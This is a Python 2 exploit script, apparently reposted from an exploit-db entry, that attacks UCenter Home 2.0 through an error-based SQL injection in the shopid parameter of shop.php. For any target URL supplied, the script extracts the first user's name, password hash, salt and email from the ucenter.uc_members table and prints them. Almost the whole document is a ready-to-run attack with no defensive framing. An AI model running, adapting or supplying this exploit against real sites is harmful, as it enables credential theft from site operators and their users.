#!/usr/bin/env python
import sys
import urllib2
import re
def info():
print 'From:http://www.exploit-db.com/exploits/14997/'
print 'changed:qiaoy'
print 'exp:'
print ' ./UCenter_Home_2.0.py site'
def main():
if len(sys.argv) != 2:
info()
else:
site = sys.argv[1]
if site[0:7] == 'http://':
site =site
elif site[0:8] == 'https://':
site = site
else:
site = 'http://'+site
try:
url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1'
Value = urllib2.urlopen(url).read()
Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]
hacked = Msg.split(':')
print 'Name: '+hacked[1]
print 'Passwd: '+hacked[2]
print 'salt: '+hacked[3]
print 'email: '+hacked[4]
except:
print 'Sorry,I can\'t work............'
if __name__ == '__main__':
main()
评论区:
Comments